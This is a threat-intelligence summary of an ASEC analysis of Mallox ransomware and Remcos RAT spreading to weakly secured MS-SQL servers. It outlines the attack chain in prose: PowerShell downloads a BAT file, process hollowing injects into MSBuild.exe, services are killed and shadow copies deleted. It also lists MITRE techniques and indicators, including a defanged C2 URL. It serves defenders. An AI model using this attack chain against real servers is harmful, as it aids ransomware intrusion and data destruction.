Threat Research

Analysis of Ransomware With BAT File Extension Attacking MS-SQL Servers (Mallox) – ASEC BLOG

Securonix

Mallox ransomware is distributed to poorly managed MS-SQL servers using BAT files, a fileless tactic that leverages PowerShell and CMD to download and execute payloads like Mallox and Remcos RAT. It injects via process hollowing into MSBuild.exe, terminates processes and deletes services, and deletes volume shadow copies, while attackers rely on weak credentials; defenders should enforce strong passwords, patch systems, and deploy EDR for visibility. #Mallox #Remcos #MSQLServer #PowerShell #ProcessHollowing

Keypoints

  • Mallox and Remcos RAT are delivered via BAT files to poorly managed MS-SQL servers, highlighting non-PE/fileless delivery methods.
  • PowerShell (and sqlps) are used to download the BAT payloads, which are then executed via CMD.
  • Mallox is injected through process hollowing into MSBuild.exe, a known process-injection technique.
  • killerr.bat is created and executed to terminate multiple processes and to shut down and delete several services, hindering recovery.
  • Volume Shadow Copies are deleted, and commands to block recovery are logged during encryption procedures.
  • Attackers target MS-SQL servers often paired with ERP/business solutions and exploit weak credentials; defenders should use strong passwords, patching, and access controls, with EDR aiding incident analysis.

MITRE Techniques

  • [T1059.001] PowerShell – Used to download the BAT and trigger execution; β€œThe BAT file downloaded by the PowerShell command is run with CMD.”
  • [T1059.003] Command-Line – The BAT file downloaded by the PowerShell command is run with CMD.
  • [T1105] Ingress Tool Transfer – The BAT file download is performed from a distribution URL (e.g., β€œtst.bat”).
  • [T1055.012] Process Hollowing – β€œthe main part of Mallox is injected through process hollowing (one of the injection methods) into MSbuild.exe.”
  • [T1562] Impair Defenses – β€œshuts downs and deletes number of services.” (Modify/Delete System Services)
  • [T1490] Inhibit System Recovery – β€œvolume shadow copies being deleted.”

Indicators of Compromise

  • [File] Ransomware BAT.MALLOX.SC189737 – 2023.06.13.02
  • [MD5] dcf060e00547cfe641eff3f836ec08c8
  • [URL] C2 – hxxp://80.66.75[.]116/tst.bat

Read more: https://asec.ahnlab.com/en/54704/

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint